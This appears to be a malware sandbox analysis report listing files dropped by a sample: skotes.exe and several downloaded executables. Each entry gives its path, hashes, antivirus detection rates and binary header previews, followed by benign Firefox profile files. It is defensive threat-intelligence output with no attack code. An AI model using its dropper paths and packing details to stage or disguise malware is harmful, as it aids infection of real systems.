Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	922112
Entropy (8bit):	6.591087909609073
Encrypted:	false
SSDEEP:	12288:MqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgavTK:MqDEvCTbMWu7rQYlBQcBiT6rprG8aLK
MD5:	0D9D9AC3AED513438004818F468DE528
SHA1:	EDD1D1ED6A751917D236495F64B1EF1E3A6420D1
SHA-256:	9C5447D7974E1EE08C3BFFD8873F103FF7B362E84508C979F6B34C54F44DB15B
SHA-512:	A8B3EEF2675203225B702C17F3BD1A291298E15CA5DDFD9D9A116B2416E25E9F8585160E182EBBC8BEA5A78027317B09D91734FC687C3E9D667C86FF9514EC96
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...^.Jg.........."..........b......w.............@..........................p......u_....@...@.......@.....................d...\|....@...........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1864192
Entropy (8bit):	7.945678245476462
Encrypted:	false
SSDEEP:	49152:gYaoryX6w3X4R7fgY94kPTZJcWY+FzC9Dc2lst:7rQ6kotfgY9TPTLcWY+A9DGt
MD5:	A9A9F7A7B9ED25C8DF3E4676A11593F3
SHA1:	54934B66D0290FDC3B89B07DE78A7E7461445416
SHA-256:	5EAD7DEFC7E896FCB9E0B8C17F978C0EB2C063CE3364925EF0DF6880FB3C7921
SHA-512:	A0CE4A944B3993395063ECF03204FA756B8B2356F0AF271E94F7132642CC18815F5AA091303B5FA39FDB7030431DB4D4D0DCDB6D11DFBC3D87FC15E96362364B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...B3Gg..............................I...........@...........................I.....:.....@.................................\`..p....P.......................a...................................................................................... . .@.......X..................@....rsrc........P.......h..............@....idata .....`.......j..............@... .`*..p.......l..............@...bioduybg....../......n..............@...eaqvzvci......I......J..............@....taggant.0....I.."...P..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4467200
Entropy (8bit):	7.98390126362659
Encrypted:	false
SSDEEP:	98304:Aw6d9osRZuyGN7I4dkerrBBu9iQVhNVvQsLS1vG5Qs1Wpz:f6nos/Gi4dkWu9dhTvdLS10Q
MD5:	52FCB84B6A36A8E28A1B56F2603EDF23
SHA1:	7C57CA452F6CAC2AC981A6D9A2F6DD6B3F1024CB
SHA-256:	A335B6DFADFCBA436732F642A8051ECD6D92B5ED1F140A7204166318885D1977
SHA-512:	A716A7694BE16901B89E8D2A5B811AE09B23F018C2745EC71C1A266311E2A83FCD4CC80B7669AB8F1BB76B960CFE1AB06BEB69339173E8B7A50182C7E8EF1D0F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...eIIg...............(.JO...x..2...........`O...@..................................rD...@... ............................._0v.s.... v............................................................................................................ . ..v......<(.................@....rsrc........ v......L(.............@....idata .....0v......N(.............@... ..8..@v......P(.............@...jyijtabb............R(.............@...ckbvpooz..............D.............@....taggant.0......."....D.............@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1473536
Entropy (8bit):	7.937162817340063
Encrypted:	false
SSDEEP:	24576:XqgOt5BhqfWXUIue3QgJaCIPwHImKimJgWbqrD4cM9BysZODGcaXBjZrGxjf6sWI:XitThqRI3btvcimJ5bEDDMSsZ4GL3rGZ
MD5:	0F325C99B7B2585A266CF50D88F134C8
SHA1:	160551D6E6F35AB8AB7401AEC1B8ADC0BEA94EBC
SHA-256:	7851C601871D56B8DB41856E6DFB518F35332B5F59153FD960BA0A0E7D1A44D2
SHA-512:	C5D1F02C49BB98BE16C61D91E369DE31C8DD8EFC19DDFF702984B91DAA8FFB66E0E15C3BF76FF88D2297E7534238E89FB2F7F28B22F7B21AD90C496B5C51BF12
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 16%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....yJg................................. ... ....@.. ....................................`.................................d...W.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc...............z..............@..B........................H.......d....x..........\|...............................................Fs....%o....o......s....}.....{.....o.....{....(....(....o......((....s...........()...F.o...r...po+....~....:....r...p.....(#...o3...s4........~.....~...........j(....r...p~....o5...t...."..}'...^.....b...b`..b`.`}'...r. ....n...bj`..bj`.j`m}'...f..(.....(.....(....s....f.(......(.....(....s....f.(.....(......(....s....f.(.....(.....(.....s....F.{'.....d ...._.F.{'.....d ...._.B.{'...

C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1864192
Entropy (8bit):	7.945678245476462
Encrypted:	false
SSDEEP:	49152:gYaoryX6w3X4R7fgY94kPTZJcWY+FzC9Dc2lst:7rQ6kotfgY9TPTLcWY+A9DGt
MD5:	A9A9F7A7B9ED25C8DF3E4676A11593F3
SHA1:	54934B66D0290FDC3B89B07DE78A7E7461445416
SHA-256:	5EAD7DEFC7E896FCB9E0B8C17F978C0EB2C063CE3364925EF0DF6880FB3C7921
SHA-512:	A0CE4A944B3993395063ECF03204FA756B8B2356F0AF271E94F7132642CC18815F5AA091303B5FA39FDB7030431DB4D4D0DCDB6D11DFBC3D87FC15E96362364B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...B3Gg..............................I...........@...........................I.....:.....@.................................\`..p....P.......................a...................................................................................... . .@.......X..................@....rsrc........P.......h..............@....idata .....`.......j..............@... .`*..p.......l..............@...bioduybg....../......n..............@...eaqvzvci......I......J..............@....taggant.0....I.."...P..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1840128
Entropy (8bit):	7.946354570205017
Encrypted:	false
SSDEEP:	49152:iM4IR3PksYn/lXz5lEsNEJqgIY210WiJC:R3PVkA+qqyWi4
MD5:	BB0C42D0421512D8F7796F5253543456
SHA1:	8B3139E22E253ADC3B55D8743A7D4CC173AA567D
SHA-256:	29CA807F5372FED46F73A09B357BE9A41C7271307D273A20FE9045EEADCE65E8
SHA-512:	20B2775045AE808319BD5283E6812EE03A6B96FAF7A110B0246E43D8DE7132822DD8C0C1DF8D0516B7350A0FC5F4B862AF30807E3DBC875CFD2BBFEFC622934E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..k..k..k.'k..k..k..k.&k..k...k..k...k..k...j..k..k..k.#k..k..k..kRich..k........PE..L....Hg....................."........j...........@...........................j...........@.................................M.$.a.....$.......................$..................................................................................... . ..$......b..................@....rsrc.........$......r..............@....idata ......$......t..............@... .P+...$......v..............@...sqwnkuay......P..t...x..............@...dlrscmkp......j.....................@....taggant.0....j.."..................@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	922112
Entropy (8bit):	6.591087909609073
Encrypted:	false
SSDEEP:	12288:MqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgavTK:MqDEvCTbMWu7rQYlBQcBiT6rprG8aLK
MD5:	0D9D9AC3AED513438004818F468DE528
SHA1:	EDD1D1ED6A751917D236495F64B1EF1E3A6420D1
SHA-256:	9C5447D7974E1EE08C3BFFD8873F103FF7B362E84508C979F6B34C54F44DB15B
SHA-512:	A8B3EEF2675203225B702C17F3BD1A291298E15CA5DDFD9D9A116B2416E25E9F8585160E182EBBC8BEA5A78027317B09D91734FC687C3E9D667C86FF9514EC96
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...^.Jg.........."..........b......w.............@..........................p......u_....@...@.......@.....................d...\|....@...........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u.......v..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2765824
Entropy (8bit):	6.472329089980284
Encrypted:	false
SSDEEP:	49152:m7sNQnouAeEI0+206WUmc17WSlt3fcgJRZc2Vbf:IGQouAeEXX03UTwSz3f22Vbf
MD5:	47AA764406BA64383AC50E4101F34474
SHA1:	48C14E56CC54EE0095C52A680D41B20E76DD3D2B
SHA-256:	0BB190F23AE3739409ED5FC96D03728CBB385A58FD544F4FB8A74AF959B2F72E
SHA-512:	D5D133CC90A1CD47255E6DB9487AE1FD8AFB7264DD084094D2DC3B782C9D0FFD783DE94FC650BAE49B20C0B1F5BC52DF5A777A99AD9D502DC0CC5700C82FF6D7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$.............. ...`....@.. ..............................:...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...xbmfzvhb..).......)..:..............@...ztggrlpz. ........................@....taggant.@......"....*.............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	4467200
Entropy (8bit):	7.98390126362659
Encrypted:	false
SSDEEP:	98304:Aw6d9osRZuyGN7I4dkerrBBu9iQVhNVvQsLS1vG5Qs1Wpz:f6nos/Gi4dkWu9dhTvdLS10Q
MD5:	52FCB84B6A36A8E28A1B56F2603EDF23
SHA1:	7C57CA452F6CAC2AC981A6D9A2F6DD6B3F1024CB
SHA-256:	A335B6DFADFCBA436732F642A8051ECD6D92B5ED1F140A7204166318885D1977
SHA-512:	A716A7694BE16901B89E8D2A5B811AE09B23F018C2745EC71C1A266311E2A83FCD4CC80B7669AB8F1BB76B960CFE1AB06BEB69339173E8B7A50182C7E8EF1D0F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...eIIg...............(.JO...x..2...........`O...@..................................rD...@... ............................._0v.s.... v............................................................................................................ . ..v......<(.................@....rsrc........ v......L(.............@....idata .....0v......N(.............@... ..8..@v......P(.............@...jyijtabb............R(.............@...ckbvpooz..............D.............@....taggant.0......."....D.............@...........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1930752
Entropy (8bit):	7.94980674543301
Encrypted:	false
SSDEEP:	49152:ea7wlm3OM01MszDNdEmzJgLZJXPLvTtY3MJnFpY:em5WXNd9zWL3XPLb2Md
MD5:	27A3277F6DAEC8E2369A88CEA407FB46
SHA1:	C7DA43B9BC1A51AA28CDA592D8266E17057AB6B7
SHA-256:	BA82209B941924AEB6196FAC31A5E2D13193F49BE26163683BF29A293B3FCEC0
SHA-512:	089B550D03E9F30D5BE540830ACA38519FB0B839EE9DEE852C86111969E12C6A0C36D821B5A2D519C7C23BF73A598A3963C01FA3DF93322C1BF6E39BE4F8116B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................`L...........@...........................L.....d.....@.................................W...k.......D....................IL..............................IL..................................................... . ............................@....rsrc...D...........................@....idata ............................@... .@+.........................@...egarwnqv.`....1..Z..................@...kktuolht.....PL......P..............@....taggant.0...`L.."...T..............@...................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.4593089050301797
Encrypted:	false
SSDEEP:	48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
MD5:	D910AD167F0217587501FDCDB33CC544
SHA1:	2F57441CEFDC781011B53C1C5D29AC54835AFC1D
SHA-256:	E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
SHA-512:	F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
Malicious:	false
Preview:	... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s\|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ExperimentStoreData.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3621
Entropy (8bit):	4.929514308466053
Encrypted:	false
SSDEEP:	96:8S+OfJQPUFpOdwNIOdYVjvYcXaNLzL+8P:8S+OBIUjOdwiOdYVjjwLX+8P
MD5:	25689572C988AA3E54B36A068F15C7E6
SHA1:	E55C43E14F33CF26CADAAAC0B4956717372D381B
SHA-256:	BC3DA989CCD776F3321CD5A1369AF5ABF87D542287B9C63B0C8D9F80F29A9EA5
SHA-512:	8244BE308548F6A27323F4605AB4BE2D7DE7E2D14045B41AA53FD244FC707BBD6DA2FAF62B3DF3E2E337045DB2844036480AF7FC4CD380F36264907F4EB17597
Malicious:	false
Preview:	{"csv-import-release-rollout":{"slug":"csv-import-release-rollout","branch":{"slug":"enable-csv-import","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{"csvImport":true},"enabled":true,"featureId":"cm-csv-import"}]},"active":true,"enrollmentId":"c5d95379-f4ee-4629-a507-6f15a0e93cd4","experimentType":"rollout","source":"rs-loader","userFacingName":"CSV Import (Release Rollout)","userFacingDescription":"This rollout enables users to import logins from a CSV file from the about:logins page.","lastSeen":"2023-10-03T11:50:29.548Z","featureIds":["cm-csv-import"],"prefs":[{"name":"signon.management.page.fileImport.enabled","branch":"default","featureId":"cm-csv-import","variable":"csvImport","originalValue":false}],"isRollout":true},"serp-ad-telemetry-rollout":{"slug":"serp-ad-telemetry-rollout","branch":{"slug":"control","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pr

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ExperimentStoreData.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3621
Entropy (8bit):	4.929514308466053
Encrypted:	false
SSDEEP:	96:8S+OfJQPUFpOdwNIOdYVjvYcXaNLzL+8P:8S+OBIUjOdwiOdYVjjwLX+8P
MD5:	25689572C988AA3E54B36A068F15C7E6
SHA1:	E55C43E14F33CF26CADAAAC0B4956717372D381B
SHA-256:	BC3DA989CCD776F3321CD5A1369AF5ABF87D542287B9C63B0C8D9F80F29A9EA5
SHA-512:	8244BE308548F6A27323F4605AB4BE2D7DE7E2D14045B41AA53FD244FC707BBD6DA2FAF62B3DF3E2E337045DB2844036480AF7FC4CD380F36264907F4EB17597
Malicious:	false
Preview:	{"csv-import-release-rollout":{"slug":"csv-import-release-rollout","branch":{"slug":"enable-csv-import","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{"csvImport":true},"enabled":true,"featureId":"cm-csv-import"}]},"active":true,"enrollmentId":"c5d95379-f4ee-4629-a507-6f15a0e93cd4","experimentType":"rollout","source":"rs-loader","userFacingName":"CSV Import (Release Rollout)","userFacingDescription":"This rollout enables users to import logins from a CSV file from the about:logins page.","lastSeen":"2023-10-03T11:50:29.548Z","featureIds":["cm-csv-import"],"prefs":[{"name":"signon.management.page.fileImport.enabled","branch":"default","featureId":"cm-csv-import","variable":"csvImport","originalValue":false}],"isRollout":true},"serp-ad-telemetry-rollout":{"slug":"serp-ad-telemetry-rollout","branch":{"slug":"control","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pr

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4 (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	Mozilla lz4 compressed data, originally 23432 bytes
Category:	dropped
Size (bytes):	5312
Entropy (8bit):	6.615424734763731
Encrypted:	false
SSDEEP:	96:V2YbKsKNU2xWrp327tGmD4wBON6h6cHaJVJuZMd0JGkkrw2D:VTx2x2t0FDJ4NpwZMd0EJws
MD5:	1B9C8056D3619CE5A8C59B0C09873F17
SHA1:	1015C630E1937AA63F6AB31743782ECB5D78CCD8
SHA-256:	A6AE5DE0733FED050AB570AD9374FF4593D554F695B5AE4E2495871D171D34A3
SHA-512:	B1DC9CC675D5476C270A2D5B214D3DF2B3856576ED7EFE92D9A606C2D9D34E781018902AE75CE9C1E25007BB7F8D8F7B52997E6F05B845EF44BAF22F614FE899
Malicious:	false
Preview:	mozLz40..[....{"app-system-defaults":{"addon....formautofill@mozilla.org&..Gdependencies":[],"enabled":true,"lastModifiedTime":1695865283000,"loader":null,"path":s.....xpi","recommendationStateA...rootURI":"jar:file:///C:/Program%20Files/M.......refox/browser/features/...... !/...unInSafeMode..wsignedD...telemetryKey..7%40R...:1.0.1","version":"..`},"pic..#in.....T.n..w...........S.......(.[......0....0"},"screenshots..T.r.....[.......(.V....-39.......},"webcompat-reporter...Ofals..&.z.....[.......(.]....=1.5.............<.)....p....d......1.z.!18...5.....startupData...pX.astentL..!er...webRequest%..onBefore...[[{"incognitoi.UtabId..!yp...."main_frame"],"url...."://login.microsoftonline.com/","..@us/L.dwindows...},["blocking"]],...Iimag...https://smartT.".f.....etp/facebook.svg",...Aplay....8`script...P.....-....-testbed.herokuapp\.`shims_..3.jsh.bexampl\|.......Pexten{..Q../?..s...S.J/_2..@&_3U..s7.addthis . ic...officialK......-angularjs/current/dist(..t.min.js...track.adB...net/s

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	Mozilla lz4 compressed data, originally 23432 bytes
Category:	dropped
Size (bytes):	5312
Entropy (8bit):	6.615424734763731
Encrypted:	false
SSDEEP:	96:V2YbKsKNU2xWrp327tGmD4wBON6h6cHaJVJuZMd0JGkkrw2D:VTx2x2t0FDJ4NpwZMd0EJws
MD5:	1B9C8056D3619CE5A8C59B0C09873F17
SHA1:	1015C630E1937AA63F6AB31743782ECB5D78CCD8
SHA-256:	A6AE5DE0733FED050AB570AD9374FF4593D554F695B5AE4E2495871D171D34A3
SHA-512:	B1DC9CC675D5476C270A2D5B214D3DF2B3856576ED7EFE92D9A606C2D9D34E781018902AE75CE9C1E25007BB7F8D8F7B52997E6F05B845EF44BAF22F614FE899
Malicious:	false
Preview:	mozLz40..[....{"app-system-defaults":{"addon....formautofill@mozilla.org&..Gdependencies":[],"enabled":true,"lastModifiedTime":1695865283000,"loader":null,"path":s.....xpi","recommendationStateA...rootURI":"jar:file:///C:/Program%20Files/M.......refox/browser/features/...... !/...unInSafeMode..wsignedD...telemetryKey..7%40R...:1.0.1","version":"..`},"pic..#in.....T.n..w...........S.......(.[......0....0"},"screenshots..T.r.....[.......(.V....-39.......},"webcompat-reporter...Ofals..&.z.....[.......(.]....=1.5.............<.)....p....d......1.z.!18...5.....startupData...pX.astentL..!er...webRequest%..onBefore...[[{"incognitoi.UtabId..!yp...."main_frame"],"url...."://login.microsoftonline.com/","..@us/L.dwindows...},["blocking"]],...Iimag...https://smartT.".f.....etp/facebook.svg",...Aplay....8`script...P.....-....-testbed.herokuapp\.`shims_..3.jsh.bexampl\|.......Pexten{..Q../?..s...S.J/_2..@&_3U..s7.addthis . ic...officialK......-angularjs/current/dist(..t.min.js...track.adB...net/s

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	SQLite 3.x database, user version 5, last written using SQLite version 3042000, page size 32768, file counter 5, database pages 8, cookie 0x6, schema 4, largest root page 8, UTF-8, vacuum mode 1, version-valid-for 5
Category:	dropped
Size (bytes):	262144
Entropy (8bit):	0.04905391753567332
Encrypted:	false
SSDEEP:	24:DLivwae+Q8Uu50xj0aWe9LxYkKA25Q5tvAA:D6wae+QtMImelekKDa5
MD5:	DD9D28E87ED57D16E65B14501B4E54D1
SHA1:	793839B47326441BE2D1336BA9A61C9B948C578D
SHA-256:	BB4E6C58C50BD6399ED70468C02B584595C29F010B66F864CD4D6B427FA365BC
SHA-512:	A2626F6A3CBADE62E38DA5987729D99830D0C6AA134D4A9E615026A5F18ACBB11A2C3C80917DAD76DA90ED5BAA9B0454D4A3C2DD04436735E78C974BA1D035B1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......\|....~.}.}z}-\|.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shm

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, file counter 4, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.07324952325868538
Encrypted:	false
SSDEEP:	12:DBl/A0OWla0mwPxRymgObsCVR45wcYR4fmnsCVR4zki+:DLhesh7Owd4+ji
MD5:	91389A85775987ABD3E518E93F442642
SHA1:	D7D0774E8ABDECF8A69AA049C1663656AC273AEE
SHA-256:	DA2C20B9A89215E007E7135C069549D5445BBD8CCBD429A16D191ED8C38E9BD9
SHA-512:	5CDBA335584B27216A5E4D2A294965F77828793B870BD1BCEAB7818283E55E5638F93076A3D86E439008ADDA96A4DC988A6412F740D29A94B07708BEDFD74928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......~s..F~s........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.035455806264726504
Encrypted:	false
SSDEEP:	3:GtlstFBpij8E1S694tlstFBpij8E1S6ltL89//alEl:GtWttij8RW4tWttij8ROtL89XuM
MD5:	F1D493D6948619046DBD8F6FD9B2E00B
SHA1:	C726540F317AC572351C650EA71DEC25AE84D27B
SHA-256:	23F10F7A16CFD9DAC899231A07D3118D8B787EEBDD999EB13253EEFA78878740
SHA-512:	F4C590122F2E4850DAEB3B2663880214925A6361A780716C730BC8043F9386C08FC9F9C92D622ECCB5C88B7C1EF596E9DA95B3F4093A33F82BF289042DD6A152
Malicious:	false
Preview:	..-........................oIp5G...V({..h.W.7....-........................oIp5G...V({..h.W.7..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	32824
Entropy (8bit):	0.03972939710481977
Encrypted:	false
SSDEEP:	3:Ol1aj8vUi/ysdMjlxVsF57l8rEXsxdwhml8XW3R2:K8AvUcilxVCl8dMhm93w
MD5:	C7EE6FF6379B043E1E785AA4ADC263F9
